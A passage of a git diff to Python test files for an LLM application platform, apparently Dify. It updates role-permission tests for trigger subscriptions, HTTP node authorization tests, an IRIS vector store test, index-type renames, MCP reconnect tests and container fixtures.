response = test_client.get( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/list", + headers=auth_header, + ) + assert response.status_code == list_status + + # Test 2: Get subscription builder (should work for Editor, Admin, Owner) + response = test_client.get( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/{subscription_builder_id}", + headers=auth_header, + ) + assert response.status_code == get_status + + # Test 3: Update subscription builder parameters (should work for Editor, Admin, Owner) + response = test_client.post( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/update/{subscription_builder_id}", + headers=auth_header, + json={"parameters": {"webhook_url": "https://example.com/webhook"}}, + ) + assert response.status_code == update_status + + # Test 4: Create subscription builder (should only work for Admin, Owner) + response = test_client.post( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/create", + headers=auth_header, + json={"credential_type": "api_key"}, + ) + assert response.status_code == create_status + + # Test 5: Build/activate subscription (should only work for Admin, Owner) + response = test_client.post( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/build/{subscription_builder_id}", + headers=auth_header, + json={"name": "Test Subscription"}, + ) + assert response.status_code == build_status + + # Test 6: Delete subscription (should only work for Admin, Owner) + response = test_client.post( + f"/console/api/workspaces/current/trigger-provider/{subscription_id}/subscriptions/delete", + headers=auth_header, + ) + assert response.status_code == delete_status + + @pytest.mark.parametrize( + ("role", "status"), + [ + (TenantAccountRole.OWNER, 200), + (TenantAccountRole.ADMIN, 200), + # Editor should be able to access logs for debugging + (TenantAccountRole.EDITOR, 200), + (TenantAccountRole.NORMAL, 403), + (TenantAccountRole.DATASET_OPERATOR, 403), + ], + ) + def test_trigger_subscription_logs_permissions( + self, + test_client: FlaskClient, + auth_header, + monkeypatch, + mock_account, + role: TenantAccountRole, + status: int, + ): + """Test that different roles have appropriate permissions for accessing subscription logs.""" + # Set user role + mock_account.role 
= role + + # Mock current user + monkeypatch.setattr(trigger_providers_api, "current_user", mock_account) + + # Mock AccountService.load_user to prevent authentication issues + from services.account_service import AccountService + + mock_load_user = mock.Mock(return_value=mock_account) + monkeypatch.setattr(AccountService, "load_user", mock_load_user) + + # Test data + provider = "some_provider/some_trigger" + subscription_builder_id = str(uuid.uuid4()) + + # Mock service method + mock_list_logs = mock.Mock(return_value=[]) + monkeypatch.setattr( + "services.trigger.trigger_subscription_builder_service.TriggerSubscriptionBuilderService.list_logs", + mock_list_logs, + ) + + # Test access to logs + response = test_client.get( + f"/console/api/workspaces/current/trigger-provider/{provider}/subscriptions/builder/logs/{subscription_builder_id}", + headers=auth_header, + ) + assert response.status_code == status diff --git a/api/tests/integration_tests/vdb/iris/__init__.py b/api/tests/integration_tests/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/integration_tests/vdb/iris/test_iris.py b/api/tests/integration_tests/vdb/iris/test_iris.py new file mode 100644 index 0000000000..49f6857743 --- /dev/null +++ b/api/tests/integration_tests/vdb/iris/test_iris.py @@ -0,0 +1,44 @@ +"""Integration tests for IRIS vector database.""" + +from core.rag.datasource.vdb.iris.iris_vector import IrisVector, IrisVectorConfig +from tests.integration_tests.vdb.test_vector_store import ( + AbstractVectorTest, + setup_mock_redis, +) + + +class IrisVectorTest(AbstractVectorTest): + """Test suite for IRIS vector store implementation.""" + + def __init__(self): + """Initialize IRIS vector test with hardcoded test configuration. + + Note: Uses 'host.docker.internal' to connect from DevContainer to + host OS Docker, or 'localhost' when running directly on host OS. + """ + super().__init__() + self.vector = IrisVector( + collection_name=self.collection_name, + config=IrisVectorConfig( + IRIS_HOST="host.docker.internal", + IRIS_SUPER_SERVER_PORT=1972, + IRIS_USER="_SYSTEM", + IRIS_PASSWORD="Dify@1234", + IRIS_DATABASE="USER", + IRIS_SCHEMA="dify", + IRIS_CONNECTION_URL=None, + IRIS_MIN_CONNECTION=1, + IRIS_MAX_CONNECTION=3, + IRIS_TEXT_INDEX=True, + IRIS_TEXT_INDEX_LANGUAGE="en", + ), + ) + + +def test_iris_vector(setup_mock_redis) -> None: + """Run all IRIS vector store tests. 
+ + Args: + setup_mock_redis: Pytest fixture for mock Redis setup + """ + IrisVectorTest().run_all_tests() diff --git a/api/tests/integration_tests/workflow/nodes/test_http.py b/api/tests/integration_tests/workflow/nodes/test_http.py index e75258a2a2..d814da8ec7 100644 --- a/api/tests/integration_tests/workflow/nodes/test_http.py +++ b/api/tests/integration_tests/workflow/nodes/test_http.py @@ -6,6 +6,7 @@ import pytest from core.app.entities.app_invoke_entities import InvokeFrom from core.workflow.entities import GraphInitParams +from core.workflow.enums import WorkflowNodeExecutionStatus from core.workflow.graph import Graph from core.workflow.nodes.http_request.node import HttpRequestNode from core.workflow.nodes.node_factory import DifyNodeFactory @@ -169,13 +170,14 @@ def test_custom_authorization_header(setup_http_mock): @pytest.mark.parametrize("setup_http_mock", [["none"]], indirect=True) -def test_custom_auth_with_empty_api_key_does_not_set_header(setup_http_mock): - """Test: In custom authentication mode, when the api_key is empty, no header should be set.""" +def test_custom_auth_with_empty_api_key_raises_error(setup_http_mock): + """Test: In custom authentication mode, when the api_key is empty, AuthorizationConfigError should be raised.""" from core.workflow.nodes.http_request.entities import ( HttpRequestNodeAuthorization, HttpRequestNodeData, HttpRequestNodeTimeout, ) + from core.workflow.nodes.http_request.exc import AuthorizationConfigError from core.workflow.nodes.http_request.executor import Executor from core.workflow.runtime import VariablePool from core.workflow.system_variable import SystemVariable @@ -208,16 +210,13 @@ def test_custom_auth_with_empty_api_key_does_not_set_header(setup_http_mock): ssl_verify=True, ) - # Create executor - executor = Executor( - node_data=node_data, timeout=HttpRequestNodeTimeout(connect=10, read=30, write=10), variable_pool=variable_pool - ) - - # Get assembled headers - headers = executor._assembling_headers() - - # When api_key is empty, the custom header should NOT be set - assert "X-Custom-Auth" not in headers + # Creating the executor should raise AuthorizationConfigError + with pytest.raises(AuthorizationConfigError, match="API key is required"): + Executor( + node_data=node_data, + timeout=HttpRequestNodeTimeout(connect=10, read=30, write=10), + variable_pool=variable_pool, + ) @pytest.mark.parametrize("setup_http_mock", [["none"]], indirect=True) @@ -305,9 +304,10 @@ def test_basic_authorization_with_custom_header_ignored(setup_http_mock): @pytest.mark.parametrize("setup_http_mock", [["none"]], indirect=True) def test_custom_authorization_with_empty_api_key(setup_http_mock): """ - Test that custom authorization doesn't set header when api_key is empty. - This test verifies the fix for issue #23554. + Test that custom authorization raises an error when api_key is empty. + This test verifies the fix for issue #21830.
""" + node = init_http_node( config={ "id": "1", @@ -333,11 +333,10 @@ def test_custom_authorization_with_empty_api_key(setup_http_mock): ) result = node._run() - assert result.process_data is not None - data = result.process_data.get("request", "") - - # Custom header should NOT be set when api_key is empty - assert "X-Custom-Auth:" not in data + # Should fail with AuthorizationConfigError + assert result.status == WorkflowNodeExecutionStatus.FAILED + assert "API key is required" in result.error + assert result.error_type == "AuthorizationConfigError" @pytest.mark.parametrize("setup_http_mock", [["none"]], indirect=True) diff --git a/api/tests/test_containers_integration_tests/conftest.py b/api/tests/test_containers_integration_tests/conftest.py index 180ee1c963..d6d2d30305 100644 --- a/api/tests/test_containers_integration_tests/conftest.py +++ b/api/tests/test_containers_integration_tests/conftest.py @@ -138,9 +138,9 @@ class DifyTestContainers: logger.warning("Failed to create plugin database: %s", e) # Set up storage environment variables - os.environ["STORAGE_TYPE"] = "opendal" - os.environ["OPENDAL_SCHEME"] = "fs" - os.environ["OPENDAL_FS_ROOT"] = "storage" + os.environ.setdefault("STORAGE_TYPE", "opendal") + os.environ.setdefault("OPENDAL_SCHEME", "fs") + os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") # Start Redis container for caching and session management # Redis is used for storing session data, cache entries, and temporary data @@ -348,6 +348,13 @@ def _create_app_with_containers() -> Flask: """ logger.info("Creating Flask application with test container configuration...") + # Ensure Redis client reconnects to the containerized Redis (no auth) + from extensions import ext_redis + + ext_redis.redis_client._client = None + os.environ["REDIS_USERNAME"] = "" + os.environ["REDIS_PASSWORD"] = "" + # Re-create the config after environment variables have been set from configs import dify_config @@ -486,3 +493,29 @@ def db_session_with_containers(flask_app_with_containers) -> Generator[Session, finally: session.close() logger.debug("Database session closed") + + +@pytest.fixture(scope="package", autouse=True) +def mock_ssrf_proxy_requests(): + """ + Avoid outbound network during containerized tests by stubbing SSRF proxy helpers. 
+ """ + + from unittest.mock import patch + + import httpx + + def _fake_request(method, url, **kwargs): + request = httpx.Request(method=method, url=url) + return httpx.Response(200, request=request, content=b"") + + with ( + patch("core.helper.ssrf_proxy.make_request", side_effect=_fake_request), + patch("core.helper.ssrf_proxy.get", side_effect=lambda url, **kw: _fake_request("GET", url, **kw)), + patch("core.helper.ssrf_proxy.post", side_effect=lambda url, **kw: _fake_request("POST", url, **kw)), + patch("core.helper.ssrf_proxy.put", side_effect=lambda url, **kw: _fake_request("PUT", url, **kw)), + patch("core.helper.ssrf_proxy.patch", side_effect=lambda url, **kw: _fake_request("PATCH", url, **kw)), + patch("core.helper.ssrf_proxy.delete", side_effect=lambda url, **kw: _fake_request("DELETE", url, **kw)), + patch("core.helper.ssrf_proxy.head", side_effect=lambda url, **kw: _fake_request("HEAD", url, **kw)), + ): + yield diff --git a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py index ea61747ba2..d612e70910 100644 --- a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py +++ b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py @@ -113,16 +113,31 @@ class TestShardedRedisBroadcastChannelIntegration: topic = broadcast_channel.topic(topic_name) producer = topic.as_producer() subscriptions = [topic.subscribe() for _ in range(subscriber_count)] + ready_events = [threading.Event() for _ in range(subscriber_count)] def producer_thread(): - time.sleep(0.2) # Allow all subscribers to connect + deadline = time.time() + 5.0 + for ev in ready_events: + remaining = deadline - time.time() + if remaining <= 0: + break + if not ev.wait(timeout=max(0.0, remaining)): + pytest.fail("subscriber did not become ready before publish deadline") producer.publish(message) time.sleep(0.2) for sub in subscriptions: sub.close() - def consumer_thread(subscription: Subscription) -> list[bytes]: + def consumer_thread(subscription: Subscription, ready_event: threading.Event) -> list[bytes]: received_msgs = [] + # Prime subscription so the underlying Pub/Sub listener thread starts before publishing + try: + _ = subscription.receive(0.01) + except SubscriptionClosedError: + return received_msgs + finally: + ready_event.set() + while True: try: msg = subscription.receive(0.1) @@ -137,7 +152,10 @@ class TestShardedRedisBroadcastChannelIntegration: with ThreadPoolExecutor(max_workers=subscriber_count + 1) as executor: producer_future = executor.submit(producer_thread) - consumer_futures = [executor.submit(consumer_thread, subscription) for subscription in subscriptions] + consumer_futures = [ + executor.submit(consumer_thread, subscription, ready_events[idx]) + for idx, subscription in enumerate(subscriptions) + ] producer_future.result(timeout=10.0) msgs_by_consumers = [] @@ -240,8 +258,7 @@ class TestShardedRedisBroadcastChannelIntegration: for future in as_completed(producer_futures, timeout=30.0): sent_msgs.update(future.result()) - subscription.close() - consumer_received_msgs = consumer_future.result(timeout=30.0) + consumer_received_msgs = consumer_future.result(timeout=60.0) assert sent_msgs == consumer_received_msgs diff --git a/api/tests/test_containers_integration_tests/services/test_webhook_service.py 
b/api/tests/test_containers_integration_tests/services/test_webhook_service.py index 8328db950c..e3431fd382 100644 --- a/api/tests/test_containers_integration_tests/services/test_webhook_service.py +++ b/api/tests/test_containers_integration_tests/services/test_webhook_service.py @@ -233,7 +233,7 @@ class TestWebhookService: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" @@ -242,7 +242,7 @@ class TestWebhookService: assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert "upload" in webhook_data["files"] + assert "file" in webhook_data["files"] # Verify file processing was called mock_external_dependencies["tool_file_manager"].assert_called_once() @@ -414,7 +414,7 @@ class TestWebhookService: "data": { "method": "post", "content_type": "multipart/form-data", - "body": [{"name": "upload", "type": "file", "required": True}], + "body": [{"name": "file", "type": "file", "required": True}], } } diff --git a/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py b/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py index 0871467a05..2ff71ea6ea 100644 --- a/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py +++ b/api/tests/test_containers_integration_tests/services/tools/test_api_tools_manage_service.py @@ -2,7 +2,9 @@ from unittest.mock import patch import pytest from faker import Faker +from pydantic import TypeAdapter, ValidationError +from core.tools.entities.tool_entities import ApiProviderSchemaType from models import Account, Tenant from models.tools import ApiToolProvider from services.tools.api_tools_manage_service import ApiToolManageService @@ -298,7 +300,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {"auth_type": "none", "api_key_header": "X-API-Key", "api_key_value": ""} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -364,7 +366,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {"auth_type": "none"} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -428,21 +430,10 @@ class TestApiToolManageService: labels = ["test"] # Act & Assert: Try to create provider with invalid schema type - with pytest.raises(ValueError) as exc_info: - ApiToolManageService.create_api_tool_provider( - user_id=account.id, - tenant_id=tenant.id, - provider_name=provider_name, - icon=icon, - credentials=credentials, - schema_type=schema_type, - schema=schema, - privacy_policy=privacy_policy, - custom_disclaimer=custom_disclaimer, - labels=labels, - ) + with pytest.raises(ValidationError) as exc_info: + TypeAdapter(ApiProviderSchemaType).validate_python(schema_type) - assert "invalid schema type" in str(exc_info.value) + assert "validation error" in str(exc_info.value) def test_create_api_tool_provider_missing_auth_type( self, flask_req_ctx_with_containers, db_session_with_containers, 
mock_external_service_dependencies @@ -464,7 +455,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔧"} credentials = {} # Missing auth_type - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" @@ -507,7 +498,7 @@ class TestApiToolManageService: provider_name = fake.company() icon = {"type": "emoji", "value": "🔑"} credentials = {"auth_type": "api_key", "api_key_header": "X-API-Key", "api_key_value": fake.uuid4()} - schema_type = "openapi" + schema_type = ApiProviderSchemaType.OPENAPI schema = self._create_test_openapi_schema() privacy_policy = "https://example.com/privacy" custom_disclaimer = "Custom disclaimer text" diff --git a/api/tests/test_containers_integration_tests/services/tools/test_mcp_tools_manage_service.py b/api/tests/test_containers_integration_tests/services/tools/test_mcp_tools_manage_service.py index 8c190762cf..6cae83ac37 100644 --- a/api/tests/test_containers_integration_tests/services/tools/test_mcp_tools_manage_service.py +++ b/api/tests/test_containers_integration_tests/services/tools/test_mcp_tools_manage_service.py @@ -1308,18 +1308,17 @@ class TestMCPToolManageService: type("MockTool", (), {"model_dump": lambda self: {"name": "test_tool_2", "description": "Test tool 2"}})(), ] - with patch("services.tools.mcp_tools_manage_service.MCPClientWithAuthRetry") as mock_mcp_client: + with patch("core.mcp.mcp_client.MCPClient") as mock_mcp_client: # Setup mock client mock_client_instance = mock_mcp_client.return_value.__enter__.return_value mock_client_instance.list_tools.return_value = mock_tools # Act: Execute the method under test - from extensions.ext_database import db - - service = MCPToolManageService(db.session()) - result = service._reconnect_provider( + result = MCPToolManageService._reconnect_with_url( server_url="https://example.com/mcp", - provider=mcp_provider, + headers={"X-Test": "1"}, + timeout=mcp_provider.timeout, + sse_read_timeout=mcp_provider.sse_read_timeout, ) # Assert: Verify the expected outcomes @@ -1337,8 +1336,12 @@ class TestMCPToolManageService: assert tools_data[1]["name"] == "test_tool_2" # Verify mock interactions - provider_entity = mcp_provider.to_entity() - mock_mcp_client.assert_called_once() + mock_mcp_client.assert_called_once_with( + server_url="https://example.com/mcp", + headers={"X-Test": "1"}, + timeout=mcp_provider.timeout, + sse_read_timeout=mcp_provider.sse_read_timeout, + ) def test_re_connect_mcp_provider_auth_error(self, db_session_with_containers, mock_external_service_dependencies): """ @@ -1361,19 +1364,18 @@ class TestMCPToolManageService: ) # Mock MCPClient to raise authentication error - with patch("services.tools.mcp_tools_manage_service.MCPClientWithAuthRetry") as mock_mcp_client: + with patch("core.mcp.mcp_client.MCPClient") as mock_mcp_client: from core.mcp.error import MCPAuthError mock_client_instance = mock_mcp_client.return_value.__enter__.return_value mock_client_instance.list_tools.side_effect = MCPAuthError("Authentication required") # Act: Execute the method under test - from extensions.ext_database import db - - service = MCPToolManageService(db.session()) - result = service._reconnect_provider( + result = MCPToolManageService._reconnect_with_url( server_url="https://example.com/mcp", - provider=mcp_provider, + headers={}, + timeout=mcp_provider.timeout, + 
sse_read_timeout=mcp_provider.sse_read_timeout, ) # Assert: Verify the expected outcomes @@ -1404,18 +1406,17 @@ class TestMCPToolManageService: ) # Mock MCPClient to raise connection error - with patch("services.tools.mcp_tools_manage_service.MCPClientWithAuthRetry") as mock_mcp_client: + with patch("core.mcp.mcp_client.MCPClient") as mock_mcp_client: from core.mcp.error import MCPError mock_client_instance = mock_mcp_client.return_value.__enter__.return_value mock_client_instance.list_tools.side_effect = MCPError("Connection failed") # Act & Assert: Verify proper error handling - from extensions.ext_database import db - - service = MCPToolManageService(db.session()) with pytest.raises(ValueError, match="Failed to re-connect MCP server: Connection failed"): - service._reconnect_provider( + MCPToolManageService._reconnect_with_url( server_url="https://example.com/mcp", - provider=mcp_provider, + headers={"X-Test": "1"}, + timeout=mcp_provider.timeout, + sse_read_timeout=mcp_provider.sse_read_timeout, ) diff --git a/api/tests/test_containers_integration_tests/tasks/test_add_document_to_index_task.py b/api/tests/test_containers_integration_tests/tasks/test_add_document_to_index_task.py index 9478bb9ddb..088d6ba6ba 100644 --- a/api/tests/test_containers_integration_tests/tasks/test_add_document_to_index_task.py +++ b/api/tests/test_containers_integration_tests/tasks/test_add_document_to_index_task.py @@ -3,7 +3,7 @@ from unittest.mock import MagicMock, patch import pytest from faker import Faker -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from extensions.ext_database import db from extensions.ext_redis import redis_client from models import Account, Tenant, TenantAccountJoin, TenantAccountRole @@ -95,7 +95,7 @@ class TestAddDocumentToIndexTask: created_by=account.id, indexing_status="completed", enabled=True, - doc_form=IndexType.PARAGRAPH_INDEX, + doc_form=IndexStructureType.PARAGRAPH_INDEX, ) db.session.add(document) db.session.commit() @@ -172,7 +172,9 @@ class TestAddDocumentToIndexTask: # Assert: Verify the expected outcomes # Verify index processor was called correctly - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify database state changes @@ -204,7 +206,7 @@ class TestAddDocumentToIndexTask: ) # Update document to use different index type - document.doc_form = IndexType.QA_INDEX + document.doc_form = IndexStructureType.QA_INDEX db.session.commit() # Refresh dataset to ensure doc_form property reflects the updated document @@ -221,7 +223,9 @@ class TestAddDocumentToIndexTask: add_document_to_index_task(document.id) # Assert: Verify different index type handling - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.QA_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.QA_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify the load method was called with correct parameters @@ -360,7 +364,7 @@ class TestAddDocumentToIndexTask: ) # Update document to use parent-child index type - document.doc_form = IndexType.PARENT_CHILD_INDEX + document.doc_form = 
IndexStructureType.PARENT_CHILD_INDEX db.session.commit() # Refresh dataset to ensure doc_form property reflects the updated document @@ -391,7 +395,7 @@ class TestAddDocumentToIndexTask: # Assert: Verify parent-child index processing mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( - IndexType.PARENT_CHILD_INDEX + IndexStructureType.PARENT_CHILD_INDEX ) mock_external_service_dependencies["index_processor"].load.assert_called_once() @@ -465,8 +469,10 @@ class TestAddDocumentToIndexTask: # Act: Execute the task add_document_to_index_task(document.id) - # Assert: Verify index processing occurred with all completed segments - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + # Assert: Verify index processing occurred but with empty documents list + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify the load method was called with all completed segments @@ -532,7 +538,9 @@ class TestAddDocumentToIndexTask: assert len(remaining_logs) == 0 # Verify index processing occurred normally - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify segments were enabled @@ -699,7 +707,9 @@ class TestAddDocumentToIndexTask: add_document_to_index_task(document.id) # Assert: Verify only eligible segments were processed - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.PARAGRAPH_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.PARAGRAPH_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify the load method was called with correct parameters diff --git a/api/tests/test_containers_integration_tests/tasks/test_delete_segment_from_index_task.py b/api/tests/test_containers_integration_tests/tasks/test_delete_segment_from_index_task.py index 94e9b76965..37d886f569 100644 --- a/api/tests/test_containers_integration_tests/tasks/test_delete_segment_from_index_task.py +++ b/api/tests/test_containers_integration_tests/tasks/test_delete_segment_from_index_task.py @@ -12,7 +12,7 @@ from unittest.mock import MagicMock, patch from faker import Faker -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from models import Account, Dataset, Document, DocumentSegment, Tenant from tasks.delete_segment_from_index_task import delete_segment_from_index_task @@ -164,7 +164,7 @@ class TestDeleteSegmentFromIndexTask: document.updated_at = fake.date_time_this_year() document.doc_type = kwargs.get("doc_type", "text") document.doc_metadata = kwargs.get("doc_metadata", {}) - document.doc_form = kwargs.get("doc_form", IndexType.PARAGRAPH_INDEX) + document.doc_form = kwargs.get("doc_form", IndexStructureType.PARAGRAPH_INDEX) document.doc_language = kwargs.get("doc_language", "en") db_session_with_containers.add(document) @@ -244,8 +244,11 @@ class TestDeleteSegmentFromIndexTask: mock_processor = MagicMock() 
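# (Editor's sketch, hedged: the fourth positional argument threaded through the
# calls below suggests the task signature now carries segment IDs alongside the
# index node IDs. The decorator and queue name here are assumptions for
# illustration, not taken from this patch.)
#
#     @shared_task(queue="dataset")
#     def delete_segment_from_index_task(
#         index_node_ids: list[str],
#         dataset_id: str,
#         document_id: str,
#         segment_ids: list[str],
#     ) -> None:
#         ...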
mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor + # Extract segment IDs for the task + segment_ids = [segment.id for segment in segments] + # Execute the task - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed successfully assert result is None # Task should return None on success @@ -279,7 +282,7 @@ class TestDeleteSegmentFromIndexTask: index_node_ids = [f"node_{fake.uuid4()}" for _ in range(3)] # Execute the task with non-existent dataset - result = delete_segment_from_index_task(index_node_ids, non_existent_dataset_id, non_existent_document_id) + result = delete_segment_from_index_task(index_node_ids, non_existent_dataset_id, non_existent_document_id, []) # Verify the task completed without exceptions assert result is None # Task should return None when dataset not found @@ -305,7 +308,7 @@ class TestDeleteSegmentFromIndexTask: index_node_ids = [f"node_{fake.uuid4()}" for _ in range(3)] # Execute the task with non-existent document - result = delete_segment_from_index_task(index_node_ids, dataset.id, non_existent_document_id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, non_existent_document_id, []) # Verify the task completed without exceptions assert result is None # Task should return None when document not found @@ -330,9 +333,10 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 3, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Execute the task with disabled document - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed without exceptions assert result is None # Task should return None when document is disabled @@ -357,9 +361,10 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 3, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Execute the task with archived document - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed without exceptions assert result is None # Task should return None when document is archived @@ -386,9 +391,10 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 3, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Execute the task with incomplete indexing - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed without exceptions assert result is None # Task should return None when indexing is not completed @@ -409,7 +415,11 @@ class TestDeleteSegmentFromIndexTask: fake = Faker() # Test different document forms - document_forms = [IndexType.PARAGRAPH_INDEX, IndexType.QA_INDEX, IndexType.PARENT_CHILD_INDEX] + 
document_forms = [ + IndexStructureType.PARAGRAPH_INDEX, + IndexStructureType.QA_INDEX, + IndexStructureType.PARENT_CHILD_INDEX, + ] for doc_form in document_forms: # Create test data for each document form @@ -420,13 +430,14 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 2, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Mock the index processor mock_processor = MagicMock() mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor # Execute the task - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed successfully assert result is None @@ -469,6 +480,7 @@ class TestDeleteSegmentFromIndexTask: segments = self._create_test_document_segments(db_session_with_containers, document, account, 3, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Mock the index processor to raise an exception mock_processor = MagicMock() @@ -476,7 +488,7 @@ class TestDeleteSegmentFromIndexTask: mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor # Execute the task - should not raise exception - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed without raising exceptions assert result is None # Task should return None even when exceptions occur @@ -518,7 +530,7 @@ class TestDeleteSegmentFromIndexTask: mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor # Execute the task - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, []) # Verify the task completed successfully assert result is None @@ -555,13 +567,14 @@ class TestDeleteSegmentFromIndexTask: # Create large number of segments segments = self._create_test_document_segments(db_session_with_containers, document, account, 50, fake) index_node_ids = [segment.index_node_id for segment in segments] + segment_ids = [segment.id for segment in segments] # Mock the index processor mock_processor = MagicMock() mock_index_processor_factory.return_value.init_index_processor.return_value = mock_processor # Execute the task - result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id) + result = delete_segment_from_index_task(index_node_ids, dataset.id, document.id, segment_ids) # Verify the task completed successfully assert result is None diff --git a/api/tests/test_containers_integration_tests/tasks/test_enable_segments_to_index_task.py b/api/tests/test_containers_integration_tests/tasks/test_enable_segments_to_index_task.py index 798fe091ab..b738646736 100644 --- a/api/tests/test_containers_integration_tests/tasks/test_enable_segments_to_index_task.py +++ b/api/tests/test_containers_integration_tests/tasks/test_enable_segments_to_index_task.py @@ -3,7 +3,7 @@ from unittest.mock import MagicMock, patch import pytest from faker import Faker -from core.rag.index_processor.constant.index_type import IndexType +from core.rag.index_processor.constant.index_type import IndexStructureType from 
extensions.ext_database import db from extensions.ext_redis import redis_client from models.account import Account, Tenant, TenantAccountJoin, TenantAccountRole @@ -95,7 +95,7 @@ class TestEnableSegmentsToIndexTask: created_by=account.id, indexing_status="completed", enabled=True, - doc_form=IndexType.PARAGRAPH_INDEX, + doc_form=IndexStructureType.PARAGRAPH_INDEX, ) db.session.add(document) db.session.commit() @@ -166,7 +166,7 @@ class TestEnableSegmentsToIndexTask: ) # Update document to use different index type - document.doc_form = IndexType.QA_INDEX + document.doc_form = IndexStructureType.QA_INDEX db.session.commit() # Refresh dataset to ensure doc_form property reflects the updated document @@ -185,7 +185,9 @@ class TestEnableSegmentsToIndexTask: enable_segments_to_index_task(segment_ids, dataset.id, document.id) # Assert: Verify different index type handling - mock_external_service_dependencies["index_processor_factory"].assert_called_once_with(IndexType.QA_INDEX) + mock_external_service_dependencies["index_processor_factory"].assert_called_once_with( + IndexStructureType.QA_INDEX + ) mock_external_service_dependencies["index_processor"].load.assert_called_once() # Verify the load method was called with correct parameters @@ -328,7 +330,9 @@ class TestEnableSegmentsToIndexTask: enable_segments_to_index_task(non_existent_segment_ids, 